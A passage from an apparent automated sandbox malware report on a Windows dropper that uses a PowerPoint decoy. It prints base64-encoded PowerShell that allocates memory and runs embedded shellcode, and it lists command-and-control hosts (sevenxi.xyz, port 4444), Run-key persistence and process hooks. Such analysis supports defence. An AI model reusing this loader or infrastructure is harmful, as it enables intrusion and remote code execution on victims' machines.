gB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQASwBDAGsAcwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAZABhACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiAGEALAAwAHgAOABhACwAMAB4AGYAYwAsADAAeAA1ADkALAAwAHgAYgAzACwAMAB4ADUAOAAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0ADcALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADUAMAAsADAAeAAxADQALAAwAHgAMAAzACwAMAB4ADUAMAAsADAAeAA5AGUALAAwAHgAMQBlACwAMAB4AGEAYwAsADAAeAA0AGYALAAwAHgANwA2ACwAMAB4ADUAYwAsADAAeAA0AGYALAAwAHgAYgAwACwAMAB4ADgANgAsADAAeAAwADEALAAwAHgAZAA5ACwAMAB4ADUANQAsADAAeABiADcALAAwAHgAMAAxACwAMAB4AGIAZAAsADAAeAAxAGUALAAwAHgAZQA3ACwAMAB4AGIAMQAsADAAeABiADUALAAwAHgANwAzACwAMAB4ADAAYgAsADAAeAAzADkALAAwAHgAOQBiACwAMAB4ADYANwAsADAAeAA5ADgALAAwAHgANABmACwAMAB4ADMANAAsADAAeAA4ADcALAAwAHgAMgA5ACwAMAB4AGUANQAsADAAeAA2ADIALAAwAHgAYQA2ACwAMAB4AGEAYQAsADAAeAA1ADYALAAwAHgANQA2ACwAMAB4AGEAOQAsADAAeAAyADgALAAwAHgAYQA1ACwAMAB4ADgAYgAsADAAeAAwADkALAAwAHgAMQAxACwAMAB4ADYANgAsADAAeABkAGUALAAwAHgANAA4ACwAMAB4ADUANgAsADAAeAA5AGIALAAwAHgAMQAzACwAMAB4ADEAOAAsADAAeAAwAGYALAAwAHgAZAA3ACwAMAB4ADgANgAsADAAeAA4AGQALAAwAHgAMgA0ACwAMAB4AGEAZAAsADAAeAAxAGEALAAwAHgAMgA1ACwAMAB4ADcANgAsADAAeAAyADMALAAwAHgAMQBiACwAMAB4AGQAYQAsADAAeABjAGUALAAwAHgANAAyACwAMAB4ADAAYQAsADAAeAA0AGQALAAwAHgANAA1ACwAMAB4ADEAZAAsADAAeAA4AGMALAAwAHgANgBmACwAMAB4ADgAYQAsADAAeAAxADUALAAwAHgAOAA1ACwAMAB4ADcANwAsADAAeABjAGYALAAwAHgAMQAwACwAMAB4ADUAZgAsADAAeAAwADMALAAwAHgAMwBiACwAMAB4AGUAZQAsADAAeAA1AGUALAAwAHgAYwA1ACwAMAB4ADcAMgAsADAAeAAwAGYALAAwAHgAYwBjACwAMAB4ADIAOAAsADAAeABiAGIALAAwAHgAZQAyACwAMAB4ADAAYwAsADAAeAA2AGMALAAwAHgANwBiACwAMAB4ADEAZAAsADAAeAA3AGIALAAwAHgAOAA0ACwAMAB4ADcAOAAsADAAeABhADAALAAwAHgANwBjACwAMAB4ADUAMwAsADAAeAAwADMALAAwAHgANwBlACwAMAB4ADAAOAAsADAAeAA0ADAALAAwAHgAYQAzACwAMAB4AGYANQAsADAAeABhAGEALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeABkADkALAAwAHgAMgBkACwAMAB4ADIANgAsADAAeAA1ADgALAAwAHgAOQA2ACwAMAB4ADMAYQAsADAAeAA2ADAALAAwAHgANwBjACwAMAB4ADIAOQAsADAAeABlAGUALAAwAHgAMQBhACwAMAB4ADcAOAAsADAAeABhADIALAAwAHgAMQAxACwAMAB4AGMAZAAsADAAeAAwADkALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABjADkALAAwAHgANQAyACwAMAB4AGEAMgAsADAAeAA1ADQALAAwAHgANAA4ACwAMAB4ADMAZQAsADAAeAAwADUALAAwAHgANgA4ACwAMAB4ADgAYQAsADAAeABlADEALAAwAHgAZgBhACwAMAB4AGMAYwAsADAAeABjADAALAAwAHgAMABmACwAMAB4AGUAZQAsADAAeAA3AGMALAAwAHgAOABiACwAMAB4ADQANwAsADAAeABjADMALAAwAHgANABjACwAMAB4ADMANAAsADAAeAA5ADcALAAwAHgANABiACwAMAB4AGMANgAsADAAeAA0ADcALAAwAHgAYQA1ACwAMAB4AGQANAAsADAAeAA3AGMALAAwAHgAYwAwACwAMAB4ADgANQAsADAAeAA5AGQALAAwAHgANQBhACwAMAB4ADEANwAsADAAeABlAGEALAAwAHgAYgA3ACwAMAB4ADEAYgAsADAAeAA4ADcALAAwAHgAMQA1ACwAMAB4ADMAOAAsADAAeAA1AGMALAAwAHgAOAAxACwAMAB4AGQAMQAsADAAeAA2AGMALAAwAHgAMABjACwAMAB4AGIAOQAsADAAeABmADAALAAwAHgAMABjACwAMAB4AGMANwAsADAAeAAzADkALAAwAHgAZgBkACwAMAB4AGQAOAAsADAAeAA3ADIALAAwAHgAMwAwACwAMAB4ADYAOQAsADAAeABiADgALAAwAHgAMgAyACwAMAB4AGQAYgAsADAAeAA1ADgALAAwAHgANQA2ACwAMAB4ADIAMQAsADAAeABlADQALAAwAHgAOABiACwAMAB4AGYAYQAsADAAeABhAGMALAAwAHgAMAAyACwAMAB4AGYAYgAsADAAeAA1ADIALAAwAHgAZgBmACwAMAB4ADkAYQAsADAAeABiAGIALAAwAHgAMAAyACwAMAB4AGIAZgAsADAAeAA0AGEALAAwAHgANQAzACwAMAB4ADQAOQAsADAAeAAzADAALAAwAHgAYgA0ACwAMAB4ADQAMwAsADAAeAA3ADIALAAwAHgAOQBhACwAMAB4AGQAZAAsADAAeABlADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADUALAAwAHgAOAA1ACwAMAB4ADAANAAsADAAeABkAGUALAAwAHgANABkACwAMAB4ADMANAAsADAAeABjADgALAAwAHgAZgA0ACwAMAB4ADIAYgAsADAAeAA3ADYALAAwAHgANAAyACwAMAB4AGYAYgAsADAAeABjAGMALAAwAHgAMwA4ACwAMAB4AGEAMwAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4AGEAYwAsADAAeAA0ADMALAAwAHgAYwBkACwAMAB4AGIAZAAsADAAeAA3AGEALAAwAHgANQBiACwAMAB4AGYAYgAsADAAeABhADgALAAwAHgAOAAyACwAMAB4AGMAOQAsADAAeAAwADAALAAwAHgANwBiACwAMAB4AGQANQAsADAAeAA2ADUALAAwAHgAMABiACwAMAB4ADUAYQAsADAAeAAxADEALAAwAHgAMgBhACwAMAB4AGYANAAsADAAeAA4ADkALAAwAHgAMgBhACwAMAB4AGUAMwAsADAAeAA2ADAALAAwAHgANwAyACwAMAB4ADQANAAsADAAeAAwAGMALAAwAHgANgA1ACwAMAB4ADcAMgAsADAAeAA5ADQALAAwAHgANQBhACwAMAB4AGUAZgAsADAAeAA3ADIALAAwAHgAZgBjACwAMAB4ADMAYQAsADAAeAA0AGIALAAwAHgAMgAxACwAMAB4ADEAOQAsADAAeAA0ADUALAAwAHgANAA2ACwAMAB4ADUANQAsADAAeABiADIALAAwAHgAZAAwACwAMAB4ADYAOQAsADAAeAAwAGMALAAwAHgANgA3ACwAMAB4ADcAMgAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADUAZQAsADAAeABiADQALAAwAHgAOABkACwAMAB4ADQAZAAsADAAeABiADUALAAwAHgANAA0ACwAMAB4AGYAMQAsADAAeAA5AGIALAAwAHgAZgAzACwAMAB4ADMAMgAsADAAeAAxAGIALAAwAHgAMQA4ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABxAHIASQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAcQByAEkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHEAcgBJACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==" (Show Process)
Spawned process "csc.exe" with commandline "/noconfig /fullpaths @"%TEMP%\6ljpalv5.cmdline"" (Show Process)
Spawned process "cvtres.exe" with commandline "/NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA6DE.tmp" "%TEMP%\CSCA6C9.tmp"" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Spawns a lot of processes
-
Suspicious Indicators 20
-
Environment Awareness
-
Reads the cryptographic machine GUID
- details
-
"<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"0XP.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"POWERPNT.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID") - source
- Registry Access
- relevance
- 10/10
-
Reads the windows installation date
- details
- "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
- source
- Registry Access
- relevance
- 10/10
-
Reads the cryptographic machine GUID
-
General
-
Opened the service control manager
- details
-
"0XP.exe" called "OpenSCManager" requesting access rights "0X0"
"0XP.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1) - source
- API Call
- relevance
- 10/10
-
POSTs files to a webserver
- details
-
"POST /sharp/r3set/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: sevenxi.xyz
Content-Length: 427
Expect: 100-continue
Connection: Keep-Alive" with no payload - source
- Network Traffic
- relevance
- 5/10
-
Requested access to a system service
- details
-
"0XP.exe" called "OpenService" to access the "RASMAN" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
"0XP.exe" called "OpenService" to access the "rasman" service
"0XP.exe" called "OpenService" to access the "RASMAN" service - source
- API Call
- relevance
- 10/10
-
Opened the service control manager
-
Installation/Persistance
-
Drops executable files
- details
-
"6ljpalv5.dll" has type "PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows"
"0XP.exe" has type "PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows"
"RESA6DE.tmp" has type "80386 COFF executable not stripped - version 25189" - source
- Binary File
- relevance
- 10/10
-
Modifies auto-execute functionality by setting/creating a value in the registry
- details
- "0XP.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"; Key: "0XP SCAN"; Value: ""%TEMP%\0XP.exe"")
- source
- Registry Access
- relevance
- 8/10
-
Drops executable files
-
Network Related
-
Detected increased number of ARP broadcast requests (network device lookup)
- details
- Attempt to find devices in networks: "192.168.56.13/32, 192.168.56.15/32, 192.168.56.16/32, 192.168.56.21/32, 192.168.56.22/31, 192.168.56.24/31, ..."
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
- details
- Heuristic match: "ping 1.1.1.1 -n 1 -w 4000 > Nul & Del ""
- source
- File/Memory
- relevance
- 3/10
-
Detected increased number of ARP broadcast requests (network device lookup)
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "POWERPNT.EXE"
"VariantChangeType@OLEAUT32.DLL" in "POWERPNT.EXE"
"SysFreeString@OLEAUT32.DLL" in "POWERPNT.EXE"
"VariantClear@OLEAUT32.DLL" in "POWERPNT.EXE"
"OleLoadFromStream@OLE32.DLL" in "POWERPNT.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Modifies proxy settings
- details
-
"<Input Sample>" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"<Input Sample>" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
-
"<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
"POWERPNT.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK") - source
- Registry Access
- relevance
- 8/10
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"<Input Sample>" wrote bytes "db4dbf6f00000000" to virtual address "0x00032000" (part of module "7D12EA86D696F05082A7560972BF221FF6E588F5E36A9B96B1FEAAF706F7B51E.EXE")
"<Input Sample>" wrote bytes "ae48c208" to virtual address "0x6C121FDC" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "40532b7758582c77186a2c77653c2d770000000000bf7e750000000056cc7e75000000007cca7e7500000000376845756a2c2d77d62d2d7700000000206945750000000029a67e7500000000a48d457500000000f70e7e7500000000" to virtual address "0x773C1000" (part of module "NSI.DLL")
"powershell.exe" wrote bytes "f75574ab" to virtual address "0x6C111FDC" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "08574d76047856760000000051c11d7794981d77ee9c1d7775dc1f77273e1f77efb223770000000046ce7e75013d7f7538ed7f75cfcd7e7531237e75de2f7f75c4ca7e7580bb7e75aa6e7f759fbb7e7592bb7e7546ba7e750abf7e7500000000" to virtual address "0x6AA61000" (part of module "SHFOLDER.DLL")
"POWERPNT.EXE" wrote bytes "775be5ba" to virtual address "0x6404CA70" (part of module "GFX.DLL")
"POWERPNT.EXE" wrote bytes "d709ddba" to virtual address "0x659621E8" (part of module "PPCORE.DLL")
"POWERPNT.EXE" wrote bytes "e9603328ed" to virtual address "0x75AF4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"POWERPNT.EXE" wrote bytes "e99e4854ed" to virtual address "0x757F3D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"POWERPNT.EXE" wrote bytes "4f572d6e" to virtual address "0x5DC99904" (part of module "RICHED20.DLL")
"POWERPNT.EXE" wrote bytes "e923992aed" to virtual address "0x75AF5DEE" ("VariantChangeType@OLEAUT32.DLL")
"POWERPNT.EXE" wrote bytes "c4ca7e7580bb7e75aa6e7f759fbb7e7508bb7e7546ce7e7561387f75de2f7f75d0d97e75000000001779db754f91db757f6fdb75f4f7db7511f7db75f283db75857edb7500000000" to virtual address "0x68371000" (part of module "MSIMG32.DLL")
"POWERPNT.EXE" wrote bytes "b4badcba" to virtual address "0x2D1D15E4" (part of module "POWERPNT.EXE")
"POWERPNT.EXE" wrote bytes "e99a5427ed" to virtual address "0x75AF3E59" ("SysFreeString@OLEAUT32.DLL")
"POWERPNT.EXE" wrote bytes "e9365528ed" to virtual address "0x75AF3EAE" ("VariantClear@OLEAUT32.DLL")
"POWERPNT.EXE" wrote bytes "99e1c486" to virtual address "0x62F90BA8" (part of module "MSO.DLL")
"POWERPNT.EXE" wrote bytes "dad4ebba" to virtual address "0x644A78E4" (part of module "OART.DLL")
"POWERPNT.EXE" wrote bytes "e9c53202ed" to virtual address "0x762F6143" ("OleLoadFromStream@OLE32.DLL")
"powershell.exe" wrote bytes "92baf6b8" to virtual address "0x6C111FDC" (part of module "MSCORWKS.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
-
"cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"mode.com" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"powershell.exe" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "SYEARMONTH")
"POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "IMEASURE")
"POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "SLIST")
"POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "STHOUSAND")
"POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "SDECIMAL")
"POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "SDATE")
"POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "STIME")
"POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
"POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
"POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
"POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
"POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
"POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
"POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
"POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "NUMSHAPE") - source
- Registry Access
- relevance
- 3/10
-
Installs hooks/patches the running process
-
Hiding 6 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 15
-
Environment Awareness
-
Reads the registry for installed applications
- details
-
"<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\0XP.EXE")
"<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\0XP.EXE")
"<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\LOCAL.BAT")
"<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\LOCAL.BAT")
"<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\POWERPNT.EXE")
"<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\POWERPNT.EXE")
"<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\POWERPNT.EXE"; Key: "PATH"; Value: "00000000010000005800000043003A005C00500072006F006700720061006D002000460069006C00650073005C004D006900630072006F0073006F006600740020004F00660066006900630065005C004F0066006600690063006500310034005C000000")
"POWERPNT.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\POWERPNT.EXE")
"POWERPNT.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\POWERPNT.EXE") - source
- Registry Access
- relevance
- 10/10
-
Reads the registry for installed applications
-
General
-
Contacts domains
- details
- "sevenxi.xyz"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"91.160.159.49:4444"
"185.117.75.48:80" - source
- Network Traffic
- relevance
- 1/10
-
Creates a writable file in a temporary directory
- details
-
"<Input Sample>" created file "%TEMP%\0XP.exe"
"<Input Sample>" created file "%TEMP%\local.bat"
"<Input Sample>" created file "%TEMP%\energies.ppt"
"POWERPNT.EXE" created file "%TEMP%\energies.ppt"
"POWERPNT.EXE" created file "%TEMP%\~DFDF4B56F96AB138F2.TMP" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"Local\ZoneAttributeCacheCounterMutex"
"Local\ZonesLockedCacheCounterMutex"
"Local\ZonesCounterMutex"
"Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\RasPbFile"
"\Sessions\1\BaseNamedObjects\Global\.net clr networking"
"Global\.net clr networking"
"RasPbFile" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "POWERPNT.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 5DC50000
- source
- Loaded Module
-
Loads the .NET runtime environment
- details
-
"<Input Sample>" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 6B580000
"0XP.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 6B570000
"powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 6B570000
"csc.exe" loaded module "%WINDIR%\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll" at 02590000 - source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "POWERPNT.EXE" (Show Process) was launched with new environment variables: "MEOW="C:\Program Files\Microsoft Office\Office14\""
Process "powershell.exe" (Show Process) was launched with modified environment variables: "PSModulePath"
Process "powershell.exe" (Show Process) was launched with missing environment variables: "MEOW"
Process "csc.exe" (Show Process) was launched with new environment variables: "localappdata="C:\Users\%USERNAME%\AppData\Local", mpconfig_reportingguid="D9765A22-4A32-46A9-92CB-043F61DC4FA2", _clrrestrictsecattributes="1", tmp="C:\Users\%USERNAME%\AppData\Local\Temp", path="%ALLUSERSPROFILE%\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Wireshark", username="65qHXIS", pathext=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", public="C:\Users\%USERNAME%\ProgramData\Microsoft\Windows Defender", processor_identifier="x86 Family 21 Model 1 Stepping 2
AuthenticAMD", computername="M9gaw3Gzo3", programdata="C:\ProgramData", programfiles="C:\Program Files", mpconfig_productuserappdatapath="C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows Defender", processor_level="21", number_of_processors="1", homepath="\Users\65qHXIS", temp="C:\Users\%USERNAME%\AppData\Local\Temp", prompt="$P$G", userdomain="M9gaw3Gzo3", systemdrive="C:", psmodulepath="C:\Users\%USERNAME%\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\", userprofile="C:\Users\%USERNAME%\\PSPUBWS-PC", appdata="C:\Users\%USERNAME%\AppData\Roaming", fp_no_host_check="NO", processor_revision="0102", commonprogramfiles="C:\Program Files\Common Files", allusersprofile="C:\ProgramData", mpconfig_productcodename="AntiSpyware", comspec="C:\Windows\system32\cmd.exe", processor_architecture="x86", systemroot="C:\Windows", homedrive="C:", mpconfig_productpath="C:\Program Files\Windows Defender""
Process "csc.exe" (Show Process) was launched with missing environment variables: "MpConfig_ProductUserAppDataPath, PROCESSOR_ARCHITECTURE, PSModulePath, PROCESSOR_REVISION, PROCESSOR_LEVEL, PATHEXT, LOGONSERVER, USERDOMAIN, MpConfig_ProductAppDataPath, SystemRoot, ALLUSERSPROFILE, TMP, ProgramData, HOMEPATH, PUBLIC, PROMPT, LOCALAPPDATA, COMPUTERNAME, USERNAME, ComSpec, MpConfig_ProductPath, FP_NO_HOST_CHECK, USERPROFILE, TEMP, SystemDrive, PROCESSOR_IDENTIFIER, Path, APPDATA, MpConfig_ReportingGUID, OS, CommonProgramFiles, ProgramFiles, HOMEDRIVE, NUMBER_OF_PROCESSORS, MpConfig_ProductCodeName" - source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- ""cmd /c ""%TEMP%\local.bat" "" on 2017-11-20.14:39:57.777
- source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"POWERPNT.EXE" searching for class "REListbox20W"
"POWERPNT.EXE" searching for class "MsoCommandBarPopup"
"POWERPNT.EXE" searching for class "OfficeTooltip" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "0XP.exe" (Show Process)
Spawned process "cmd.exe" with commandline ""cmd /c ""%TEMP%\local.bat" "" (Show Process), Spawned process "mode.com" with commandline "mode con:cols=20 lines=1" (Show Process), Spawned process "powershell.exe" with commandline ""powershell -w 1 -C "sv IY -;sv FI ec;sv CSH ((gv IY).value.toString()+(gv FI).value.toString());powershell (gv CSH).value.toString() 'JABtAHYAZQAgAD0AIAAnACQASwBDAGsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABLAEMAawBzACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQB